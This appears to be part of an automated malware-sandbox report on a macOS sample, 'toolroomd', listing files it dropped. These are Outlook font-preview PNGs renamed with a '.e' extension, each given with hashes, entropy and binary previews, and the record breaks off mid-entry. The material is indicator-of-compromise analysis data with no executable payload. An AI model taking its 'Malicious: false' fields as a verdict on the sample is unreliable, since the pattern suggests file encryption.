Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.510674685326661
Encrypted:	false
SSDEEP:	24:Ex9DqO/+wQWX8VnB0vIVAkbXRMpkwiRLbMkx5IBxUT9Z2VwbPtNsePc0m7:ExEC+w/XCrV/XR0iJHQxUr0INNpq
MD5:	B39A350EF183E3283DF3404B42993258
SHA1:	DD0CB6EB745CA652A8CCBE9759C3437BC5505828
SHA-256:	339EA3289796A156DF777D8A4485CA3CC52619F1C981CA07846D54AF9506D752
SHA-512:	649239E44B29BB3739EBE4DCD8837B4E7A76C915F03740F0A75562307E132DFFFC7533EE1B9E92DF243980FB98FF9CAE7FC93F32E7B114C54B91A73D2038875E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.)E.BD._..Q.d...z.A...v.=.6k..Q[_.."\|.gR.2....A.<o.....E..<.x...<.x...1^...o...!>P. l.0...+.ok%N$.u]x.g..>.xK.U......F..o.s.Hg..8..J.(<=...C...q...Q.b....Qt...jxvu........0..DJ.....+._..d...j.EEb........%tLl..)...>..P.J`L. L.o....6S.......P...J.3{.T.C(..W..W.N...x.....W.C.......t6.p...h..R..H..HU.s..+..K....`.f.....h.<.D..s...5.}d.Q4...t.P.}..t...>[##.Z...].4..@...$....)i..;/....]..H.4......z..C....;U&....7.d..vC.R...3...a.x.J.I.8y.&.>.../HB..t.m"\....>....#...[..'...".>I8.z.O.xb<......}...(....8d...BO.t`. Z.y....jN,.F...d.^...X..l.!.....}..d.VT...hd............{5YOq...})....x.C.~..:.<..........Y../....4..I...l.......":.......8M.H.....8`g.\Y-..N..5.D:..ph.-..j`.@..............~.......M#.O..(%7..Bm/."0.....eVXl.........)Gv...w.HE..x.........("O.3.....L...v\....b.B..M2..J1..b..v&.:.G...?...&I.^.....(7......u.I..`.M.....V....()....=..*cXCq...U.Y.XAk=o"K.......O@y.ILQ....O../.c...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple ChanceryChancery.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.58741153012731
Encrypted:	false
SSDEEP:	24:VZufF0lRGG9+udQ7KjZpee1tfqUQxocMGLuCnyzrL9vzoWTeZ9fm5Dh/XqsePc0q:+elb+uG74ZoenoaCnKLyUk9fmvSNpq
MD5:	6158706403C889CCBA58B97C6B2E25EE
SHA1:	F7D843BCEEEE7AB596FC1185567C77EDD463338C
SHA-256:	80123FEAF377C8498DE13534078822CBE6DFE2BADE9BDFB20D79A5F141C9C268
SHA-512:	55D450B5EDBBFD9EB792EB86257007E62B605E835FDD1F143B4D3C788ED037FB1ABB4BCAFEF715365E5CBF097C3A35C7B4E06CA8A4E692999EDC02F5903CDCC9
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a...k..K..8.9....D..t?tc...\M.{M\..+!72.dTajPL.jK..)...n.....U.....2z.....p...cT...}...E..J....c.4....g...Zs..V:...}g....v..8i%S.m.......{..K...Vk.N.....W......(..\|Dh.....Gz.X.u...}..P....._...E.m...{\b=.5......j{Ee&...o#k....z.,...g.m....gQ.r.J..x.4..%...O.\|M....@h..>.WEN.Z...r.X.hJr.....Ao..#L.....H.[s.Xg.Q@;..g..a.."&..Z....".')...5..i...=}D.K4?.U.......T.Co_..A..o..k..f>s.8.S.&....AM..=c..bg.....t.9d.G.o[qe...W.wk.ZV.V..J..[.l..{.^.>+y.=...H~.../....zx..O)....mp..#$........(...Pky..^x.;.(;.j}....T.WU....~..l_E.w"...]...w.E.r...e$......_..l,..[/'y....j.4..2..r....Iy_.5..b.'8.zM...."X.omW.Vdf.Z.._.]d.M....79.9.....0C......."..6. . VP....3..U.4.%.X....i..6..c....B...g.6..U...o.^8&.Y"..\|.5.EQfW..}..........0.......%.R..b.j=.D..EA.....h....>.3.E....s}.z.......%0...+.H!.h......I...A...J....{Os16.\.B.....L.(..Z...%..37+.Q%.U......0.cp..g.q.+..........&.lf.K#.t2..,Q.6jAt'..V........h....e..wl,.<..A..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Color EmojiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.627078541689958
Encrypted:	false
SSDEEP:	48:ElbAl1ybsrVl1flL2KsreVO3ebdy93wwqCG484p5x9JtyNpq:wAYqbjVOGu3wMG48O9zyu
MD5:	A74E016F3CBDFD2EBF6F2FA2AA3D1D45
SHA1:	836BCB2D468FF233B26BA9B05D6C31783BFF0FA7
SHA-256:	5E77ED71938A6FD0ABFF71920C0175923584DE0E6AFF285DAD649A7B29B267F9
SHA-512:	5E369C2AD6331B9523BDC09C0E36C2366ECD8EC49EA5CA2D54F5D4B6EF6B41FDA634578508D09CF6DF5D62BB7C1510C0A5FDAFD48C3E2C44FFE38C50F31C3BBC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a1.mM...H.3...^...3.....M.M....c.8.s.......&..\|h.\%+.W.&=p....H.....5....P....l~=.....^M>.......h..tP.Q...................a.W&..\.7.3...S.i.q.cX...{.....H...\|a<o.;.\..$.B....OA...<...5.W..&....}...:R6...?...t%Y.`....v.F........l-.t.R..U.181hk.R`...i.k..J`7.../.p`..{I....(..........J....6....5.(...n..]....x.....&G...R...N..ar8.~.O.J.%.;.yZ.#...9i?.cDN..........9'..!.yo...kp!Mg..L;g...:u.y.N....l..>/fr.y.\|.[.eUWHw.g.~.r...5w>..e4.x..>..j....... .B....L..B..f....[.....^./.L...}M.AN..H.......8;...e........Zu.M~..Ps...:..z..&.D.3..-..YXH.%.....=)<......I..>.G...(.b...}r.$..1.....O.=....!..o ..\|u.}^\u.8....FG..f.....:...f./.C.#T.#T..m.d.6.;_4=..f..K.d.b...".5./...>...4.....6q....u4.K.u!i..;.8...0hW:..&..j.C.M..r..S.. .....$...g..........Y.rL$.........t....u...Z.R....]...`Y.....-.-r.bz(.Yy.\|..V!..;..R..h....4.V..5%l.FY...$.....hW..5.J....X...E..q$.Y%..9.Loox...t.>,Ff9....n.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple SD Gothic NeoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2050
Entropy (8bit):	7.662597713779949
Encrypted:	false
SSDEEP:	48:EsLOjUpZugtC7Kj9hcXoIT4TXTypLONpq:/fpY2C7Kjyoi4TXTylOu
MD5:	F180EBE0C408330E2E223074AE556584
SHA1:	666F74BD13C3F99374E84B5C42805D708E8FFDF0
SHA-256:	46312A27A38E66E27B7E46A34885D3CF0E10ABD6AC9638F44EE84959F41484BC
SHA-512:	00874E57A3C371D4A101A476772EEA0B7DF7FAEC3637E6AA38A5725F55CDAAA46E2B681D2C2D0915F4D5E661CAC51507EEFE446B3FBA2F5DDDC1050F1789CF7F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.al.o...i.6...T...H.A..I.$.>...?%.......I\|%..m...%...[..>...H.u.........u.N.E:..a&......V8.......d..b..H@..8.....8....<..)..D669:v...J.........A2.Sw...U.,.z.R..,z..`.o...u .Mm#6..cL.7..'.r.W...0...'.x.....5.E2..u.U5...xy........&up..X.....4.....d...DI.KI..k%4.2z.......G..t..U..u.5.p..c.'n..$.....1.....v./.{.....o.1\.G..@G......V........~.@....@...-.}.0..]yB$.......2...6.,@!..eOH<...$?.....s\....R.%I....q.A..!<l./...8A..j.P..V.?-.7!v....rd.&...Z.yS..X:..x#.e%9....,...g.e.....K....].......1..Hc..\|^..g.....E.z..u.=.^2.~.<..j@......n../..BV>.rj:k.[....O.9..6.R6Fv.7.....m........~j.Gf./...uyt.$$.O:.@.uk.qc.m....l.y>..tf.].xb%g...IL...Nn....-....z.Zh..HT...]..9<..L..=.P}...KG.\4.}.$.e.....aK1.....e........{..$........,..V.T.QD.....fz$........+$..v.........[....='.....Q.uB.0.W..*....z/.Q[i-.Z@.Q\|..Y3.;q.h._!...v..I...9.v0&.+....v.A.].?\.M(.i\.W..Xf........I.U..Y.."KR.....,3x.`..Q.4...I~h&.<..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple SymbolsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1802
Entropy (8bit):	7.609830776789813
Encrypted:	false
SSDEEP:	24:EIGcwtdylI1IJpJgRaI+69RFY8R6sn2fR0+e0QVy6uLVX2tQlyPg8q8TA2Re5FsF:EddGJgReib7R52W+e0Sy7V2i864enNpq
MD5:	D6801150482AD22BE8B88DE48F68DF33
SHA1:	859DE50C17CD2C01568E2BD61500967F2A5CA92A
SHA-256:	3167F9AC4CFF35EEB2F22FFE7C2DAA37CAE8737E019D61DB0001F4CC80B8B287
SHA-512:	2F5403CDFFDBCFEDFFEAB01C7CF4390C58FDE2E0CDA57F9CE25903BB604EDD01A0CDF98A8464CCCB1022A8F37DBA86DDD7E441A7AB04768F5EF7692C1358F5DC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aGB.S.\....Fj.U..\|i....."...%%..b...^f.G....^...o.z....u.....S..$x..c..U%@j....g..+BR...^..y.....Y......3<m....b..w....o.?....o.?....o.?.S.,Zu...)o.....m..Le....7.....1C.&......g.J:t..@...D..2k.P..0.#LbY...8;...L.....7...[yu..\....&;41..n;h5u.....~=+..0....].Rb.77y........N...=zw.>.F....BBN...m..,.[pB.Q..Y......F...\?..d...d[mTK...LA}....L.G..%F...~s..T...L..J....m.!..S.. ..UM;..O..............J@.%K....>....}9E..f&....UgZ...~x..D{.2.!..+c..t..k-..wg.....x.....S..&C.=7m{G..\|...Gg..u..#.uS.t.jc.R.v...Y...6.G...AB.{...{.$.Kt.X.b...%......L.cn.YnaS...3R.cy..a..>...9..=..$....<N.......(...).....RtSO".$..........@..z.8.W......T1.f...r.f..r...:.{..v#"."S..v.B...x.-.......6F8...l.....b.....'R......:...^.7.."gO.:........^.t..h.5.x..!x.6(..W.H..)..Y.u9..A ..T.Vrf...\|..&.L..Bn....SF........3.bcV.}>\..\".}^.n.6.6....:k.,Rx.$....@n.aw.[a..z.W}..._e...^......"mo.f...1..:r...[Z.......+q.U...,6..,a..n1....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AppleGothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.4603549230549415
Encrypted:	false
SSDEEP:	24:E0jOHPcKMqQsfUmXYs911KyrlnLWccsD6v6k85KxPhqNLWsePc0m7:E0jOvcSfUgYiwELcs3k85sPhCaNpq
MD5:	178D1050090A99C2807B58D67ABEBEE9
SHA1:	9A825B0DB758C17C98B8889BDFFAAFBAA66CC6A6
SHA-256:	E2CC9E3D008EB8DE55774E5FCFF25ABF6457E0AB2B80D82E53A028FA5E17234D
SHA-512:	54AB55788C56CCBCD53A4C290E220C5E0B685AAAFEE567FA344030766C501C64A2AC6A6594CEF0FA3A0E6E57BBFB3DF90BE219124C28121551A42B0306C3E1AE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..9zN...SE.P....Y....{"_4D..G..;...3.Y..a..@G)^.~.2.^..f.{h..J.:...m.d]G.N.c......e..2..7X..\|...J.W.4..1(...K........^6..S...lss..EA........l[<S#.h...'.oq"..3...'1.....zra....#-...m....t..z...M.c;..y.pY.r..P..sF....>.!..K..Lq.9U.".........j..<..o,....L;m4.....N.."\..&.....8..W..1W.rku./..Z..L]jI.-..P..Pl..8m...B67..y&..s.....r...5.8.MW.....Q..*.......s&.z...WZ.....Ic.?.../.......s[!..~..2-e........t.e=.pS..@....D....`..$.J..e..p.oW....['...<..;#.&.'c.:.....\.C..........W-..o.........bD$..8-..`.WW.......q..F...8....].~.E_R....3P....8.8(......[.%.4q.7..\..9.^y....t.f ......0..a.5.0........)s9.#..../C.IB..;...u`c.(>..m=t2o..D...=+..s>..2.....F#.B.0..{..;...Ut_..H..K&\X..w...>.....N.Fb..>J.'...}.s9.Ji.3..Se../.m.6.\....2.B?..4....{....].vK.....f.../.S..8.p...G.1.c..D..P....G\|..z....U...h^.!....I//x.4....g#.,"..(YR.)M}d..0...&.d.\|m......K.L.....\)N..aR.C_$e\|...%.>a......(.pP....Z.....a5...L?o\

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AppleMyungjoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.613044822609018
Encrypted:	false
SSDEEP:	48:EH3IJTPPaXnaRW9zGhTlt3w+DXl3n+doNpq:s3yTSXaOyhTlTDV3+dou
MD5:	2B5EE196897F51D83AAF41C021E5FF8F
SHA1:	680A2753CD669DAFB6F208B41B337C415DD15BE7
SHA-256:	EF55A6202F512AA76A33B94417386E53FD20E09F0163675127E7F3AF1D41938F
SHA-512:	9DACA9630D3AFDD97DA8F67E26533B14B91B742D1A0D34E962879B3B15324AE1D75C119D9A317758175522BE50A84A5DCCA01DF88D76C7117BD5C7D4253F9E60
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a. .y.........7...K....8.g.'...YT1..`s..n4..QZ..r...].Z...4Q..%..HU.e8Wpg.uB.=v.l3P.A...GTm... ...\Na....6..=....6..=....6..=..A......^.>,..i....y..~......dX..!p.I....Xn.....~f.Umy-33fF..)........;....bG......&2.\|..1..\......C....X..S;........F$..[Z......7...D..D.O.!..,PZ`z:.ao.).[...+"B.E...@...(..1.......v.T.....=x_m%..sE..H..1.z&Q..8..`..q..[.~..9/...J..w....e.XO5aVo.. .....n_y.e)...&.I....{7m..Zg....... vy .CNYH..$.A...vfS.O....a...6..VZ......BP.jE...r...L[.P.C.\.B.@H[....[...@.0.y.T.;....c....\|.v...3.p$......06R...h..'.B.D&.F&.....H/.......1..)\gj.....,m..I....tc...\|.l>~.....%-.GS...p.,....J...6a6t.wSz.=..../.l......0w'..W5.Lv..1;\|N..f..(yj...5.....h.D.......v..{.Z.K..l.....=.u..m_.X.jlh-%.....6.M..c.r.6.!........d.....!..OF....D.......3.....T...K......65.v=.>.8w..Iy.t.Z.}.H.....L.Z...'.S!..... $.../.g.b6.2A..M./iZ..+)...^.....3........T}....&5.)J..xN...T7{M..W_...A...5.x.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Hebrew ScholarRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2066
Entropy (8bit):	7.684020246020498
Encrypted:	false
SSDEEP:	48:EmV5ENv7omarSMW4MvpKml8NQP/zP9X0/BUGSoX2QNpq:h5mk9rrMKQ/zVi2GFXHu
MD5:	1E99F8079E0725F5B125652AE723E4C9
SHA1:	228BAC142D9BE589162B55C7CCD89934A10F82BA
SHA-256:	4B6830BB5A23264EB11ACF631EF3EDBB8B93B6657FA2D721F83AE6E632A4CC5F
SHA-512:	F0DBD781D4820DC4D3AC740E119FBD702312714A60D5D8A6E38B769EF066BA533A29F3107EB0B809EDF5197E6EB666C4EED892CD42152C293110A8DFA55EE87F
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...jU..6...T...g...G........6.\L..Y0R.JG............L.#3........b........ulp%.&....u:.>..+;.9@.i.....r..7..$.4.7..$.4h.V...<.w}..?.....\|3.'.W.L=.o.n...6G~3...;.....Z9...l{&+.......B.e.. .x....."..%.W..A!3..8........+..p....8...{..?...Gw......D.D._...W.i.:~O.H.!Z..,.E....w...9.7...;'Z.C....98.....Aq&..qZ...}.Q!..%................=."k..Y..@l....@.;(.....~.dM...7..\..hf..5.%.hG...4....+.......+l6K..3b...5'.R?Z.h....}l..5.....6f..v!.5.O.V'..X9.MP...R...,...U"...N...f6.A....q<.z6.....n.f...1Z%C....UC.5t.8......6d.4..L!S..E...,..o.n<.T..p......kN\|.x....li.X7&...+...S...@.K."M~."M....[h............. ..s.6....Gcq.Ba/VN"..%%1Xy.D..s.)_"..V........JQ%%#..7..?.....h.Y.j"?.....T.UOI 5..$.j.Z..\...8..I.D..>@.9.\|c.....q.e.;..i......D..]eO...Q..4..c ....$7..7X.nR......W..x4.1T...4.. .cU..L..k....&..U.....C...F.<..^...v.....l....62...th?.....\...W.0Vm........j..#..9........o..R.Y.,.>(.t_M.....S=..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial HebrewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1530
Entropy (8bit):	7.525539900177263
Encrypted:	false
SSDEEP:	24:Ew8aNMc+onG2zh3hX6yFQuoVMvxGE0maFQusXI4wOe4Gcd9gGsePc0m7:EiNMctnGA3AyFQjVoxj0maQVXtH3Npq
MD5:	593AF7DE3A001D09FCD925F0B931B5DD
SHA1:	5D254BA4ED52CECAA3003FF774BDC7605F9D0666
SHA-256:	BDA7CE1D0B87787973D9C27FE8B2A4090B9F430610F32B560C939CEF21664EBA
SHA-512:	AEBEB5B065A0CE1CD433A4F7E16211049B72B9C6484E7838137F46D9A0AC6CA6BECFA01127342B71A49CE0E3AE525879D95BD4498B8C45308185D79085726957
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.G-RK.Y.Rc..=....K..O..].....)b.........N.g..j..".k...m.....E...5}..@....$H......^n/.M.D.o....,.r0%..OX.%.4...X...Y...,.&.K.UO.dK ........T.4....2{DH.....,.O..}\|H0a..._.qi.9. NG...\.Nq.o.UB.Ohd.&.O.&yh...c.......^..c.D...rE.RI..m\|bpS;...k.4.`>...9.l...V.....xv6.G...!.G9.U..v....V..P..4..)..=......vead..g...Q#.(b C..y..6^2<L...o..g..J+............k.....y.e.._..zJ.p5>.0..o...L:..{....he.O{.;...>..&...b...z.$./w.w7..~.......6....Z...I....x.j.{5.~.].........0..kd...S3c....$.C.t\S...bZ..5~E....W.......Y......8I`!.&.P.b.8.Z.j.j.._...\|...}W~..A.......7.....r..1.@.'..q...L....T.MCA.N..ec.?.Crx...J....j...pe..OJcR@.....{ ..X..."..kD..I..Q.....p.o....D~......z=...cd._...~sh.......?L..=..X...+.7[....5....[Z.O:..T.L.........?u.<.;.ag....b.@."..V.q...G.....4.0..@.C..rm~...\E!......jE...c...O..q......$%.Um;..KK.xG2...3d'..kR.....D.;V.e.....l.d=d.U...bqf.iUs.!..nR.+..... .f.%.v.........[...6..+...L...

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Rounded MTBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	7.663466052938329
Encrypted:	false
SSDEEP:	48:EZz48ZeTFlnWY20bsFHaHEupwohgwVxaNpq:GerN20QFHaHE0hjVQu
MD5:	8E49F0C2FEED44BF54C2324495BEAD02
SHA1:	E0D9EC6148BD8D914014ED2438FCDE1001C08AB8
SHA-256:	C48C9CB6FE6300D3C3AEB34998A47C568301541502BB7C4D326DB9E0D24B0ACD
SHA-512:	2FF18E5FA80FD52880863CDFEB671046673C833DCBD15E79E239927F0C8F724BC5339EC93EDF1037E7A34E06287E3AD24CC6DED586791B1B09C4A294EFBBE120
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....\...^..".\|g.A.....I1Y.yk.(.... S{....9.9..q....e.Hld.?......^"...H..f.(..>..+..e.\..(.[..m......)D..B....B....B....B.....r.!sbTB+..u................C..k........D......0.u..t.~....x8...0L.pb.:.H.?\.I..?`{....../. .x.dl}..[... !..s..4...........K.M.....".Ue......Q2...7{b..<.$I...or..54.K.I.....!..#.....................l....F..3$i.o(....7/.:w..?\|v.1.....#.:.\|....*.i....66..i...,0. ..@.....r...eMN........HBT..k....B.!.;..4.x.ga.gc..'il..t.[.....l..X.U.#Q=...v)...~.g.. .`+....jJ!D..0.N.q...e..f...8..z..I....-'....'.T.Ypqf..Fi.m...j...H)V....5.'...f...t.]=....p.l)...........]..v8..#)..)K[.._..b......a.]......_.A....0...p....2.)?(.>.;o...F.Q..Ya..b.E@..?EO..L........ti.q.....)....{......W...{Z).....3....Y.....S.......ys&..Hj.b.U..lx..{j'.J..E.H3.R.O.........\...]-..~.L.h$:...\....hW..y....&..1..0....o].rv..A>.{2\|2.....t....f.$..l..h.N..P.&.Z..\|-..8..c..u.v0.....Q.y..T.A.<.F'f.BP.s

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Arial Unicode MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.6085763036567675
Encrypted:	false
SSDEEP:	24:EW9htnq57BIR8iiC0zQ/UxJmi6WVI1x7EguQTiS2VylKzsZsePc0m7:EWntn27WR94ln6W6xAXQrl0oNpq
MD5:	70594FA7913C735D611138F10D2C70E6
SHA1:	1CD4C2A34891F04E2CDD4D1BE0BA46F6A6B4CF8B
SHA-256:	FF25DDD3834AFB052B60C765EC81B838B695F17F5581758326FD49F4D07D8547
SHA-512:	1C455F993E39AE3801EDF35BBD7661DF48E7B3FBA25B2F44425DA90391CC53D8511D0A3CA6FF41344851153365D7486ACBC98ABAB1140018F49DA38390C5959E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.b.S..+...+tWJ.:. ....u......=&...s}......j!..T-]%..J..\..m]...e..y1Q........y...'.4.U....j.7.u.....,..t(gt.XY..[...XY..[...XY..[..sp..P.(..........H..\...B.8..ja(Z]~...].qmX.L...x..%..&I?.$L...X...6=...........?(..0..V..F...L=,!..(6c.......6.z....G...2.....yl3`.....8.Hk~...c...le.9..$.] ..]g..#W....)..5u#.O.......t._[.\g........wJ...x....'?D.....j..".R..U1.,...t ....m\|/....H...M>p-!.@.U...p.;....1^.z......V...qw....R...j.f.C.......n!JW..L>)}...'......\../.8R_b._. ..:.......e... ....\|.3i.7J^..I...v..-..ZxZ%..GX..$h...&.]q).\|..>..j}....\|H....+I}..m.X:..:...k.]?.....}.......>.&..1.K;..uAN...sz\|.Z..?.X]..4..U.......Z....$:!;2@... kCZ/p......W.k......<...&..fE...e..TtB.B;ZU{;nl........rV.R.........km 5De&.q...aZ..k.$...2......b[\|.j..#.......g.../..X.^.....T0x.x_...`&..$.../ZQY.h....'.....!.(.^......-.w.f.."N..+..Tr.^.u.6.z9l...K..,....Wg).#>.6.C.Y..J...R............J... (.,>...$.?./.......qt......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ArialNarrow.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	7.129517247502441
Encrypted:	false
SSDEEP:	24:EWNZyD4sjh3Fe5+fY5eAyHXCILsePc0m7:EWNZPMNf/P3PNpq
MD5:	36EEF7CF45B25F59ED00F26CA6C55038
SHA1:	1841C23F8873DF930C980D5F14A10F065CBCDB3B
SHA-256:	2A095D9DC05B532ADD462B671C087C3480ABB8AEA1738A64FDE96A323A978E57
SHA-512:	9E12C6E4E821050C87ACA77552F496F1E8B1978ECA96F695E310D72C8C420D16EACD5EBEA568E13FD32CAABDD7F320F81181DECA39A00B182CE8FCBA53F86578
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.N...F.'..@.._....,z...O...4.T.`.m.V....\|~anT..p...B....p..8..ZtB&o.Q...{&0......&G...>..V..\P..J.;7...k.....d.C...]..q-.n......p...8....j.w..NJ...#.5T.V...#..!`.A...\L..x...x.R.4.T.........g...AL.[q8.J.a......Np....jk..&...O..x.U.0y(....:=..a....Wv..'..C1mAD.\u..\|.#.)..x.D...:{'...g....hy\|..~xH.;.I..T.....>...w......U.e^...<.!3Mu.yk.^.....i..D...?{_.....7;E`.C.....;u'g....9%<..O...]D...?...g.\|..."D[..%&C..f../&...U....G.c........+..,........2..;..._.....w_.].I...7.^u/..u.....K.UM......i8V#...%..}.!..E.,..{.[..B.:.m..K.,...r[>...-.{..Rq@....t0.$j=%...H$6...O...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ArialRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	7.125689695663443
Encrypted:	false
SSDEEP:	24:EWNZyD4sjh3Fe5+fY5eAyHXCIWVsePc0m7:EWNZPMNf/P3SVNpq
MD5:	66FA9C10D7CE7FBF822B7B9B0B01836F
SHA1:	5CA692BCA9A079725ED80935176CF82A0D31F798
SHA-256:	E6A9CFE9CC11E71FA9B454E45CE65EF094C18D20F6937B4792D33706964931BA
SHA-512:	0476C7A40CF199AEF4A3602F2EE3221648ED99B8E886BD879FA7A7BE3CE4CDB193B9DF9CFD456F7337AE889712B440FC793830EA96F728C08A3BC1029151F246
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.N...F.'..@.._....,z...O...4.T.`.m.V....\|~anT..p...B....p..8..ZtB&o.Q...{&0......&G...>..V..\P..J.;7...k.....d.C...]..q-.n......p...8....j.w..NJ...#.5T.V...#..!`.A...\L..x...x.R.4.T.........g...AL.[q8.J.a......Np....jk..&...O..x.U.0y(....:=..a....Wv..'..C1mAD.\u..\|.#.)..x.D...:{'...g....hy\|..~xH.;.I..T.....>...w......U.e^...<.!3Mu.yk.^.....i..D...?{_.....7;E`.C.....;u'g....9%<..O...]D...?...g.\|..."D[..%&C..f../&...U....G.c........+..,........2..;..._.....w_.].I...7.^u/..u.....K.UM......i8V#...%..}.!..E.,..{.[..B.:.m..K.,...r[>...-.{..Rq@....t0.$j=%.......\|.E...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.AthelasRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.3729001358625865
Encrypted:	false
SSDEEP:	24:E6g3uGM2Ziw1zGwbixRYcooLfhi1jov+yEGesePc0m7:E6guRGfMTbLfhi1jov+yJeNpq
MD5:	ABC46325B27B7554BF912D87943DC124
SHA1:	61985FA11B8181F299461A2692AD942517E445E1
SHA-256:	98F1D11AFA4169D0BB6F2530918B00FBC76563CFC74CFCDD489A219C931A93BD
SHA-512:	B1F2FC724C29FCF6675F486F9A0943F49FA1274DCBFF34B3742C2D02A80460AA3F5976F9966503F13C816AD4A434934D6D0AD5FD3BC5BEA44150FE671BF32778
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.S\|n....&......v.(.^...hg..m{....ei..@.I.`HI.P.A.6...}.+.y.C.w..<.yz..A.)....L...yM..e..,.].5"....$.".u.9).d:~o..O.........\!6A.Dc...$.........[.r..b\..c.9....8.x..Y...m$.#F.f@p...... .V`{2<.;...P....9.u.x....HL.{Xm#.9..(......O..2...s.GrwY..X..Z$S.3MN.~.~En%O..H.2...y\\V..0.s......+..FdV..\|2.b..4...../.L.`....v...q.G.9-.../@.1T.z..u/. ......9..\|9.....'.ZDTKq....h%.............&..0.m.LO..1E...GY.V'..T....494.+....j.~.'!u...y.J..N.L..h.....j6.......".x...$...b........'.;l..8..../.lSXF.rk.<.....@].Ws...q3....GsC...l...J.h..CtA .BLG.......G.>nx{..AP../...i"!.\|.F.+.)....Qce+...p..T.S.KM;'..98.ar.......k.Q....iv.Cx....]6P#..~7...]..U..p.)z..M6L2@...K.+.b.b.......H}.......ee...G...#f...m=..x..PC2H+{.nu...,..:...{.u...L.g..)P.h&'.L$L.p^+$.V.d!..z..wk.:..W..\w..9....N.C.m..=...B..1...g..........t!........uFh#..9...s.b..V0...}.e}~doIm..r- .JS.....................\.........^./k..`R..V5..jd..ysVT*9.X

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Avenir Next CondensedCondensed.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1962
Entropy (8bit):	7.634556768075776
Encrypted:	false
SSDEEP:	48:EJjx/ZZuMPOlwCKT0tTiikTP9e+VhTe71jVL6ZrhrOsBbfWISNpq:Sx/VOlYT0tTiDe+Te3OlOsB/Su
